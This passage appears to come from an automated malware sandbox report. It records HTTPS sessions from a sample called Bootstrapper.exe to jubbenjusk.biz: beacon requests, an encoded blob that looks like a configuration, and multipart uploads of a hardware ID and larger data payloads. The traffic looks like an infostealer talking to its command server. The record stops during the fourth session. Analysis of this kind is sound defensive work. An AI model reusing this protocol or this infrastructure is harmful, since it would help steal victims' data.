                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 8
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                    Data Ascii: act=life
                                                    2025-01-12 06:10:18 UTC1126INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=rkca962foc9dd1nf36pjrpauh7; expires=Wed, 07 May 2025 23:56:57 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTJucYzdw3tBuc2M8i42FJu7CiDDhgQL4hc6gZ4cXTttYJk8UaTTqUjf7AbNV%2F6LOyPuQUfwyEiGKrTrPhhrJA17CG1OnMTlF4zzaaiU7tFc3uM%2Fu7x6BkxYIPHV%2Bs5p1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afb920b260cb8-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2413&min_rtt=1690&rtt_var=1150&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1727810&cwnd=179&unsent_bytes=0&cid=729193da108e587e&ts=535&x=0"
                                                    2025-01-12 06:10:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2025-01-12 06:10:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.649711172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:19 UTC262OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 86
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:19 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                    Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                    2025-01-12 06:10:19 UTC1121INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=0rqeqb37rvt3dm451j9mhmur31; expires=Wed, 07 May 2025 23:56:58 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p55zci0DuXhujkID7rIXErm7XQupwGKKSpRZPkq6pDGvsI9flWs1zXgP%2FbAALg3NwHAySfDfOxKiXcNRyYtdJpJqYNLjXztFStAfhYdAio7nDfjKhYXF2z2YIlQDqyc2wQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afb982ba342d8-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1607&rtt_var=734&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=984&delivery_rate=1817050&cwnd=222&unsent_bytes=0&cid=eb859c182477c730&ts=506&x=0"
                                                    2025-01-12 06:10:19 UTC248INData Raw: 34 33 30 63 0d 0a 63 75 6c 52 31 43 49 35 42 2f 54 47 64 4d 37 6f 39 74 67 74 36 73 62 2f 6f 74 58 55 74 67 4a 76 55 67 41 36 41 30 34 4b 45 46 67 4a 79 79 66 32 47 41 30 72 31 72 55 52 37 4e 4b 51 75 55 47 5a 6f 39 4f 41 74 4c 43 55 4f 41 6b 7a 62 45 6c 6d 59 69 68 6d 4e 56 44 54 4e 37 56 4f 53 6d 4c 59 35 42 47 32 79 73 79 44 56 73 69 6a 6b 59 44 76 39 74 4e 6f 44 54 4e 73 57 47 49 6c 5a 57 41 30 45 59 45 39 73 30 70 63 5a 4a 43 6e 47 4b 4f 4e 6b 37 31 4d 67 4b 69 57 7a 37 32 35 6c 43 35 4e 4e 33 6f 59 4f 57 78 48 64 53 77 54 70 44 43 6e 53 52 74 36 32 4c 31 57 71 34 62 55 34 67 2b 4c 6f 35 33 4f 73 37 44 64 61 67 63 36 5a 46 6c 6e 4a 48 70 35 50 68 71 42 4d 37 42 4c 56 6d 32 45 71 68 4b 6b 68 70 57 33 54 4d 6a 71 33 63 65 76 39 6f
                                                    Data Ascii: 430cculR1CI5B/TGdM7o9tgt6sb/otXUtgJvUgA6A04KEFgJyyf2GA0r1rUR7NKQuUGZo9OAtLCUOAkzbElmYihmNVDTN7VOSmLY5BG2ysyDVsijkYDv9tNoDTNsWGIlZWA0EYE9s0pcZJCnGKONk71MgKiWz725lC5NN3oYOWxHdSwTpDCnSRt62L1Wq4bU4g+Lo53Os7Ddagc6ZFlnJHp5PhqBM7BLVm2EqhKkhpW3TMjq3cev9o
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 77 67 58 67 4a 68 53 58 41 35 5a 57 49 38 55 4a 52 39 72 77 42 63 61 64 62 38 56 71 53 47 6d 72 39 4d 68 36 4f 63 77 4b 57 35 31 47 4d 46 4f 47 5a 53 62 69 4e 6e 66 44 41 58 67 7a 71 78 54 31 78 74 6b 4b 73 56 37 4d 54 55 76 56 66 49 2f 4e 33 67 70 37 58 58 64 41 41 68 49 6b 63 76 4e 53 68 31 4e 6c 44 54 63 37 42 4f 57 6d 69 57 74 68 36 6e 67 5a 47 6f 52 49 47 70 6b 4d 43 36 76 4e 74 6a 44 54 64 6f 55 6d 34 6d 62 48 38 33 46 6f 73 7a 39 67 34 62 59 6f 37 6b 54 75 79 70 6b 61 70 49 68 4c 4c 66 2b 76 65 70 6d 6e 6c 4e 4e 32 34 59 4f 57 78 67 64 7a 6b 54 67 44 79 31 53 46 42 33 6c 72 59 51 6f 59 2b 47 76 45 71 47 72 70 37 53 76 62 6a 53 59 77 51 37 61 31 31 6d 4b 43 67 38 65 68 65 54 63 2b 34 41 65 6d 69 64 71 42 79 37 69 74 53 6c 41 5a 48 6b 6d 73 7a 33 37
                                                    Data Ascii: wgXgJhSXA5ZWI8UJR9rwBcadb8VqSGmr9Mh6OcwKW51GMFOGZSbiNnfDAXgzqxT1xtkKsV7MTUvVfI/N3gp7XXdAAhIkcvNSh1NlDTc7BOWmiWth6ngZGoRIGpkMC6vNtjDTdoUm4mbH83Fosz9g4bYo7kTuypkapIhLLf+vepmnlNN24YOWxgdzkTgDy1SFB3lrYQoY+GvEqGrp7SvbjSYwQ7a11mKCg8eheTc+4AemidqBy7itSlAZHkmsz37
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 36 49 68 59 68 4b 33 41 79 59 6c 43 36 4a 4c 30 43 62 6d 61 59 71 68 47 36 79 6f 76 30 56 73 69 6a 6b 59 44 76 39 74 6c 6f 43 44 56 74 57 57 73 69 62 58 67 32 47 49 55 77 70 45 39 66 5a 5a 71 73 48 4b 47 45 6b 4c 4a 47 67 36 2b 62 77 4c 61 38 6c 43 35 4e 4e 33 6f 59 4f 57 78 63 64 54 59 64 68 48 47 44 51 31 56 72 6b 62 4a 57 73 38 53 4e 2b 6b 69 45 35 4d 57 41 75 37 2f 55 61 77 63 30 59 6c 39 73 4b 57 74 31 4f 52 32 4d 4f 62 68 48 58 32 6d 66 71 52 43 73 6a 5a 43 2f 58 59 32 74 6b 63 7a 33 2b 4a 52 6e 46 58 41 36 47 45 34 72 66 6e 45 56 45 35 6f 36 39 6c 38 56 66 4e 61 6a 47 75 7a 53 31 4c 31 4b 67 4b 2b 62 79 4c 65 6b 30 57 34 47 4d 57 68 65 59 43 46 6b 64 44 6f 52 69 7a 57 36 51 46 78 69 68 4c 59 54 71 70 69 65 2b 67 48 49 6f 34 57 41 37 2f 62 69 63 42
                                                    Data Ascii: 6IhYhK3AyYlC6JL0CbmaYqhG6yov0VsijkYDv9tloCDVtWWsibXg2GIUwpE9fZZqsHKGEkLJGg6+bwLa8lC5NN3oYOWxcdTYdhHGDQ1VrkbJWs8SN+kiE5MWAu7/Uawc0Yl9sKWt1OR2MObhHX2mfqRCsjZC/XY2tkcz3+JRnFXA6GE4rfnEVE5o69l8VfNajGuzS1L1KgK+byLek0W4GMWheYCFkdDoRizW6QFxihLYTqpie+gHIo4WA7/bicB
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 62 69 56 6e 65 6a 49 66 68 44 65 34 52 6c 31 6f 6b 36 73 63 76 6f 4b 61 74 30 53 48 72 34 2f 41 75 72 4c 59 5a 41 55 37 61 42 67 76 62 47 39 71 65 6b 6a 4c 42 72 74 50 57 32 61 41 35 41 6e 69 6b 39 53 39 51 38 6a 38 33 63 79 35 74 74 74 73 41 54 74 71 57 57 30 69 62 33 63 7a 47 49 4d 68 74 30 52 54 5a 4a 69 72 46 36 69 50 6b 62 35 49 6a 4b 4b 53 67 50 6e 32 30 33 68 4e 61 43 4a 33 52 68 6b 71 55 77 42 51 6c 48 32 76 41 46 78 70 31 76 78 57 6f 49 6d 59 73 6b 43 4f 72 5a 48 4b 76 72 33 59 61 77 6b 38 61 31 31 6e 4c 57 31 33 4f 78 53 48 4f 62 42 44 57 47 71 5a 71 78 37 73 78 4e 53 39 56 38 6a 38 33 65 57 67 76 64 70 6d 54 53 38 73 51 53 45 72 5a 44 4a 69 55 49 63 36 73 45 5a 65 61 5a 65 69 48 71 6d 43 6b 4c 74 4a 6a 71 65 53 78 4c 4b 33 32 32 51 42 50 6d 68
                                                    Data Ascii: biVnejIfhDe4Rl1ok6scvoKat0SHr4/AurLYZAU7aBgvbG9qekjLBrtPW2aA5Anik9S9Q8j83cy5tttsATtqWW0ib3czGIMht0RTZJirF6iPkb5IjKKSgPn203hNaCJ3RhkqUwBQlH2vAFxp1vxWoImYskCOrZHKvr3Yawk8a11nLW13OxSHObBDWGqZqx7sxNS9V8j83eWgvdpmTS8sQSErZDJiUIc6sEZeaZeiHqmCkLtJjqeSxLK322QBPmh
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 58 6b 6f 46 34 51 33 73 55 78 64 61 70 43 6c 45 36 61 47 6b 37 39 45 68 36 6a 64 6a 76 65 78 7a 43 42 56 63 45 78 54 63 6a 74 72 66 44 45 47 6b 48 4f 70 44 6b 49 6c 6b 61 68 57 39 4d 71 58 73 55 53 4d 70 4a 48 41 73 37 76 55 63 67 49 33 5a 56 46 71 50 6d 4a 31 50 52 75 44 4f 4c 6c 47 53 57 6d 59 74 68 4f 2b 6d 4e 54 30 44 34 2b 38 33 5a 6a 33 67 4e 4e 77 48 54 4d 67 61 58 63 76 66 6e 6b 33 48 4d 73 73 2b 46 6b 62 59 70 72 6b 54 75 79 4d 6d 37 4e 4d 68 36 57 55 7a 4c 71 7a 33 57 55 4d 4e 6d 5a 53 61 79 78 75 64 44 73 56 67 54 43 33 53 6c 4a 69 6e 71 4d 56 76 73 72 61 2b 6b 69 51 35 4d 57 41 6e 72 48 47 62 68 31 77 66 52 5a 34 62 47 39 2b 65 6b 6a 4c 4e 37 78 50 58 32 4b 61 6f 68 4f 71 68 35 57 31 54 6f 69 72 6d 63 75 2b 73 4e 56 74 43 44 31 6d 53 6d 73 6e
                                                    Data Ascii: XkoF4Q3sUxdapClE6aGk79Eh6jdjvexzCBVcExTcjtrfDEGkHOpDkIlkahW9MqXsUSMpJHAs7vUcgI3ZVFqPmJ1PRuDOLlGSWmYthO+mNT0D4+83Zj3gNNwHTMgaXcvfnk3HMss+FkbYprkTuyMm7NMh6WUzLqz3WUMNmZSayxudDsVgTC3SlJinqMVvsra+kiQ5MWAnrHGbh1wfRZ4bG9+ekjLN7xPX2KaohOqh5W1Toirmcu+sNVtCD1mSmsn
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 43 4c 4f 62 4e 4b 56 6d 61 5a 70 77 53 74 6a 49 61 36 51 6f 4b 32 6c 38 75 79 75 39 6c 74 44 6a 5a 6b 55 32 30 2b 59 58 49 35 47 38 74 39 39 6b 64 44 4a 63 37 6b 4e 62 75 63 6e 72 31 44 6e 71 2b 63 77 36 47 37 78 43 42 44 63 48 4e 66 63 47 77 77 5a 43 6f 48 6a 43 7a 34 57 52 74 69 6d 75 52 4f 37 49 79 64 76 45 69 4f 71 6f 2f 46 73 62 6e 62 61 51 51 30 61 6c 74 68 4b 47 78 31 50 78 4f 48 4f 4c 46 44 56 47 47 66 71 68 2b 6a 79 74 72 36 53 4a 44 6b 78 59 43 57 72 64 64 73 41 48 42 39 46 6e 68 73 62 33 35 36 53 4d 73 2f 75 45 56 62 62 35 43 67 45 36 71 41 6b 62 70 45 69 36 75 5a 78 72 4f 35 31 47 73 45 4d 57 52 64 61 79 64 75 66 7a 6b 57 6a 58 50 34 41 46 78 39 31 76 78 57 6a 4a 47 5a 74 6b 6a 49 75 39 50 5a 39 37 48 59 49 46 56 77 61 56 52 6c 4b 32 68 2f 4f
                                                    Data Ascii: CLObNKVmaZpwStjIa6QoK2l8uyu9ltDjZkU20+YXI5G8t99kdDJc7kNbucnr1Dnq+cw6G7xCBDcHNfcGwwZCoHjCz4WRtimuRO7IydvEiOqo/FsbnbaQQ0althKGx1PxOHOLFDVGGfqh+jytr6SJDkxYCWrddsAHB9Fnhsb356SMs/uEVbb5CgE6qAkbpEi6uZxrO51GsEMWRdaydufzkWjXP4AFx91vxWjJGZtkjIu9PZ97HYIFVwaVRlK2h/O
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 78 57 30 70 7a 6d 37 51 52 37 4c 58 61 2b 6c 66 49 2f 4e 33 31 74 4c 6a 61 5a 78 73 68 4c 33 39 33 4a 6d 39 69 50 51 65 45 63 2f 67 41 58 53 58 4f 39 31 6a 73 6a 6f 58 36 46 39 6a 32 78 70 58 6b 34 59 51 79 45 6e 35 37 47 48 64 73 4d 43 42 30 55 4a 6c 7a 37 67 41 63 5a 6f 53 32 45 4b 2b 63 6c 2f 31 78 74 6f 4f 48 7a 62 47 68 78 56 34 7a 4e 33 68 56 5a 7a 74 35 50 69 38 54 68 54 32 78 56 68 73 72 31 71 74 57 39 4c 50 55 38 67 2b 33 36 74 33 59 39 2b 36 55 56 51 34 2b 62 46 39 33 50 53 56 56 49 42 32 4e 4a 4b 63 41 46 53 57 51 35 45 37 38 78 4e 53 2b 58 73 6a 38 7a 5a 4c 73 34 34 63 33 58 57 4a 39 46 6e 68 73 66 6a 4a 69 51 73 56 7a 70 41 41 44 4a 64 47 6e 42 4c 36 4d 6c 36 78 4d 7a 35 71 6a 37 72 43 77 30 57 63 64 63 6b 78 54 64 53 73 6f 50 48 6f 66 79 32
                                                    Data Ascii: xW0pzm7QR7LXa+lfI/N31tLjaZxshL393Jm9iPQeEc/gAXSXO91jsjoX6F9j2xpXk4YQyEn57GHdsMCB0UJlz7gAcZoS2EK+cl/1xtoOHzbGhxV4zN3hVZzt5Pi8ThT2xVhsr1qtW9LPU8g+36t3Y9+6UVQ4+bF93PSVVIB2NJKcAFSWQ5E78xNS+Xsj8zZLs44c3XWJ9FnhsfjJiQsVzpAADJdGnBL6Ml6xMz5qj7rCw0WcdckxTdSsoPHofy2
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 4b 39 61 69 56 76 54 59 32 76 70 4c 6d 65 54 46 6b 4f 58 74 67 54 4e 61 59 44 42 48 4c 7a 55 6f 5a 48 70 49 32 58 33 32 55 68 73 39 31 75 4d 56 76 70 69 53 75 56 6d 4c 34 36 50 2b 6b 4c 6a 54 59 52 73 67 64 56 63 75 41 6c 35 54 42 43 36 65 4d 4c 68 4f 58 48 4f 48 35 46 6a 73 68 64 54 69 64 73 6a 73 33 66 2f 35 39 73 77 67 56 58 42 58 57 32 38 69 62 32 51 72 58 61 77 39 73 55 46 4e 64 59 47 72 57 59 4b 38 74 66 6f 42 79 4b 4c 64 6d 4f 58 34 6c 47 51 63 63 44 6f 49 4d 33 63 39 49 57 31 41 32 53 7a 34 57 52 74 7a 31 76 78 45 34 73 71 47 2b 68 66 49 34 35 37 53 70 62 44 58 64 67 35 33 58 47 5a 47 49 6d 39 7a 4c 41 43 47 50 35 64 44 53 6d 2b 6f 6d 67 4f 76 68 4a 71 39 57 5a 6e 6b 30 34 43 34 39 6f 78 5a 54 58 67 69 5a 79 39 73 63 44 4a 69 55 4c 34 77 75 45 35
                                                    Data Ascii: K9aiVvTY2vpLmeTFkOXtgTNaYDBHLzUoZHpI2X32Uhs91uMVvpiSuVmL46P+kLjTYRsgdVcuAl5TBC6eMLhOXHOH5FjshdTidsjs3f/59swgVXBXW28ib2QrXaw9sUFNdYGrWYK8tfoByKLdmOX4lGQccDoIM3c9IW1A2Sz4WRtz1vxE4sqG+hfI457SpbDXdg53XGZGIm9zLACGP5dDSm+omgOvhJq9WZnk04C49oxZTXgiZy9scDJiUL4wuE5
                                                    2025-01-12 06:10:19 UTC1369INData Raw: 52 57 38 6a 61 71 45 59 70 71 6a 6a 63 50 31 6d 74 4e 74 41 51 35 63 62 33 41 72 65 44 41 63 45 35 30 77 39 67 34 62 66 64 62 38 56 6f 47 59 6b 36 70 4d 79 6f 69 61 7a 62 76 32 79 79 34 55 63 48 51 59 4f 58 38 6d 4d 69 68 51 30 33 50 78 51 30 6c 33 6b 4b 63 41 72 38 32 71 68 47 4b 61 6f 34 33 44 39 59 66 5a 5a 42 73 6c 59 55 68 6d 45 6c 5a 66 4b 42 65 62 4d 50 52 6c 59 53 65 6e 73 68 57 73 68 4a 50 36 41 63 69 38 33 5a 6a 33 6d 38 5a 6e 48 54 4d 67 66 56 74 75 57 57 51 35 45 49 55 30 39 67 34 62 61 64 62 38 56 71 47 59 6b 36 70 4d 78 4b 4f 48 78 2f 65 70 6d 6e 6c 4e 4a 69 49 41 4d 6d 49 6f 59 48 70 49 79 33 53 34 54 56 70 6d 6d 4b 63 45 76 6f 79 58 72 45 7a 50 6d 71 50 76 76 4c 66 45 62 52 77 39 5a 6b 35 66 45 6b 39 30 50 78 65 31 44 59 46 52 58 48 58 55
                                                    Data Ascii: RW8jaqEYpqjjcP1mtNtAQ5cb3AreDAcE50w9g4bfdb8VoGYk6pMyoiazbv2yy4UcHQYOX8mMihQ03PxQ0l3kKcAr82qhGKao43D9YfZZBslYUhmElZfKBebMPRlYSenshWshJP6Aci83Zj3m8ZnHTMgfVtuWWQ5EIU09g4badb8VqGYk6pMxKOHx/epmnlNJiIAMmIoYHpIy3S4TVpmmKcEvoyXrEzPmqPvvLfEbRw9Zk5fEk90Pxe1DYFRXHXU


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.649712172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:20 UTC273OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=TB978WPRBRX
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 12824
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:20 UTC12824OUTData Raw: 2d 2d 54 42 39 37 38 57 50 52 42 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 41 34 33 32 38 44 38 33 34 31 41 41 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 54 42 39 37 38 57 50 52 42 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 42 39 37 38 57 50 52 42 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 54 42 39 37 38 57 50 52 42 52
                                                    Data Ascii: --TB978WPRBRXContent-Disposition: form-data; name="hwid"7AA4328D8341AA22B960CC18D99B375A--TB978WPRBRXContent-Disposition: form-data; name="pid"2--TB978WPRBRXContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--TB978WPRBR
                                                    2025-01-12 06:10:21 UTC1132INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=cif5c3hu446ccc2773fbi3nkqs; expires=Wed, 07 May 2025 23:57:00 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xGz%2FNZqx2lbZHmmt9LMzpdP3w%2FqP1e6v4qOBss3E9GedkLVzBPBMK%2FdZvJ%2BvL3jIk4fceGGjzcwb%2FGK201q9aI0EXibGcRxQ1nHIQnM9ABVRzLFnn4YKHSEVLpIijzLSOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afba06828236b-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1897&rtt_var=746&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13755&delivery_rate=1434184&cwnd=172&unsent_bytes=0&cid=c08f2811f06ce788&ts=594&x=0"
                                                    2025-01-12 06:10:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                    Data Ascii: fok 8.46.123.189
                                                    2025-01-12 06:10:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.649714172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:22 UTC271OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=KF9G91EFC
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 15058
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:22 UTC15058OUTData Raw: 2d 2d 4b 46 39 47 39 31 45 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 41 34 33 32 38 44 38 33 34 31 41 41 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4b 46 39 47 39 31 45 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 46 39 47 39 31 45 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 4b 46 39 47 39 31 45 46 43 0d 0a 43 6f 6e 74 65
                                                    Data Ascii: --KF9G91EFCContent-Disposition: form-data; name="hwid"7AA4328D8341AA22B960CC18D99B375A--KF9G91EFCContent-Disposition: form-data; name="pid"2--KF9G91EFCContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--KF9G91EFCConte
                                                    2025-01-12 06:10:22 UTC1136INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=4ahccblrmtbjr1gd98ij4bg0u0; expires=Wed, 07 May 2025 23:57:01 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqBx%2Fe27GCGwleKIaZknbYCsmEWhtusCEm5vba1m%2BDqpkashzxgrJuQAhLHrom2ZrEC%2FNo%2Fc%2Fs%2FQlYQEOOXY2MNGOxBKmcSuao%2BuyhlLMzwkkF4TXe6BE4D85GbfmKDITQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afba85d758cca-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1964&rtt_var=763&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15987&delivery_rate=1409946&cwnd=239&unsent_bytes=0&cid=da20bcf05617d0d6&ts=500&x=0"
                                                    2025-01-12 06:10:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                    Data Ascii: fok 8.46.123.189
                                                    2025-01-12 06:10:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.649721172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:23 UTC271OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=ZSLO3EWW2
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 19916
                                                    Host: jubbenjusk.biz
